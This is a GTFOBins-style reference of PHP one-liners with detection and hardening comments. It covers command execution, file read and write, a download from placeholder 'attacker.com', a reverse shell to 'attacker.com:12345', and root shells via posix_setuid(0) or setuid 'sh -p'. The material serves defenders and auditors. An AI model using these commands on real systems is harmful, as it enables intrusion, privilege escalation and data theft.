php
Command Execution
# shell_exec() runs the command through the shell and returns its output, which is echoed.
# The command runs with the privileges of the php process, so php should not be reachable
# by untrusted users through sudo rules, the setuid bit or file capabilities.
# Detection: a php CLI process started with -r whose child is a shell or an unexpected binary.
php -r 'echo shell_exec("/path/to/command");'
# exec() appends each line of the command's output to $r; the lines are joined with "\n" and printed.
php -r '$r=array(); exec("/path/to/command", $r); print(join("\n",$r));'
# proc_open() with three pipes (0 = stdin, 1 = stdout, 2 = stderr); "@" hides proc_open warnings.
# stdout is read to EOF before stderr is read, then all pipes and the process handle are closed.
php -r '$p = array(array("pipe","r"),array("pipe","w"),array("pipe", "w"));$h = @proc_open("/path/to/command", $p, $pipes);if($h&&$pipes){while(!feof($pipes[1])) echo(fread($pipes[1],4096));while(!feof($pipes[2])) echo(fread($pipes[2],4096));fclose($pipes[0]);fclose($pipes[1]);fclose($pipes[2]);proc_close($h);}'
Download
# Fetches a URL into memory and writes the body to a local path ("attacker.com" is a placeholder host).
# The transfer is plain HTTP with no integrity check, and it depends on the allow_url_fopen ini setting.
# Detection: php CLI making outbound HTTP requests followed by file creation; egress filtering
# on hosts that have no reason to fetch content limits this.
php -r '$c=file_get_contents("http://attacker.com/path/to/input-file"); file_put_contents("/path/to/output-file", $c);'
File Read
# readfile() copies the file to standard output. Access is decided by the identity of the php
# process, so an elevated php reads files the calling user could not open directly.
# File-access auditing on sensitive paths will show php as the reader.
php -r 'readfile("/path/to/input-file");'
File Write
# file_put_contents() creates the target or replaces its content (FILE_APPEND is not passed)
# with the literal string "DATA", using the file permissions of the php process.
# File-integrity monitoring on configuration and startup paths catches unexpected writes by php.
php -r 'file_put_contents("/path/to/output-file", "DATA");'
Reverse Shell
# Opens an outbound TCP connection to the placeholder host and port, then starts /bin/sh with
# stdin, stdout and stderr redirected to descriptor 3, which the one-liner assumes is the socket.
# Detection: a php process holding an established outbound connection with an interactive shell
# as its child. Default-deny egress rules on servers limit where such a connection can go.
php -r '$sock=fsockopen("attacker.com",12345);exec("/bin/sh -i 0<&3 1>&3 2>&3");'
Shell
# system() starts an interactive /bin/sh attached to php's terminal. The shell inherits the
# identity of the php process, which is why php should not appear in sudo rules for untrusted users.
# Detection: php as the parent process of an interactive shell.
php -r 'system("/bin/sh -i");'
Capabilities override (when the php binary has CAP_SETUID):
# posix_setuid(0) asks the kernel to switch the process to UID 0 before the shell starts. It
# succeeds only when the process may change its UID, e.g. the binary carries the cap_setuid
# file capability. The return value is ignored, so a failed call still starts an unprivileged shell.
# Hardening: list file capabilities with getcap and remove cap_setuid from interpreters.
php -r 'posix_setuid(0); system("/bin/sh -i");'
# passthru() starts the interactive shell and passes its raw output straight through.
# The process tree looks the same as with system(): php as the parent of /bin/sh.
php -r 'passthru("/bin/sh -i");'
Capabilities override (when the php binary has CAP_SETUID):
# Calls posix_setuid(0) and then starts the shell with passthru(). The UID change only takes
# effect if the process is permitted to set its UID; the result is not checked.
# Detection: audit rules on setuid-family syscalls issued by a php process.
php -r 'posix_setuid(0); passthru("/bin/sh -i");'
# popen() in "r" mode starts the shell and gives php a read-only pipe to its output, which is
# echoed in 4096-byte reads until EOF. "@" hides popen warnings, and the handle is closed with pclose().
php -r '$h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
Capabilities override (when the php binary has CAP_SETUID):
# Calls posix_setuid(0) and then relays the shell's output through a read-only popen() pipe.
# Hardening: interpreters rarely need file capabilities; without permission to change UID the
# posix_setuid(0) call fails and the shell keeps the caller's identity.
php -r 'posix_setuid(0); $h=@popen("/bin/sh -i","r"); if($h){ while(!feof($h)) echo(fread($h,4096)); pclose($h); }'
# pcntl_exec() replaces the php process image with /bin/sh (requires the pcntl extension), so
# no php parent process remains afterwards. Parent/child lineage checks miss this; look at exec
# events instead, where a process that started as php executes /bin/sh.
php -r 'pcntl_exec("/bin/sh");'
Capabilities override (when the php binary has CAP_SETUID):
# Calls posix_setuid(0) and then replaces the php process with /bin/sh via pcntl_exec().
# The UID change is not checked and only succeeds if the process may set its UID.
# Detection: a setuid-family syscall followed by an exec of a shell in the same process.
php -r 'posix_setuid(0); pcntl_exec("/bin/sh");'
SUID override (when the php binary has the setuid bit set):
# Passes -p (privileged mode) to the shell so it keeps the effective UID instead of resetting
# it to the real UID. This only changes the outcome when php itself runs setuid.
# Hardening: an interpreter should never carry the setuid bit; include php in periodic audits
# of setuid files.
php -r 'pcntl_exec("/bin/sh", ["-p"]);'
Upload
# Starts PHP's built-in development web server on all interfaces, port 80. No -t docroot is
# given, so it serves the current working directory without authentication or TLS; every file
# php can read there is exposed. Binding to port 80 typically needs elevated privileges.
# Detection: an unexpected php listener in socket listings; inbound filtering limits its reach.
php -S 0.0.0.0:80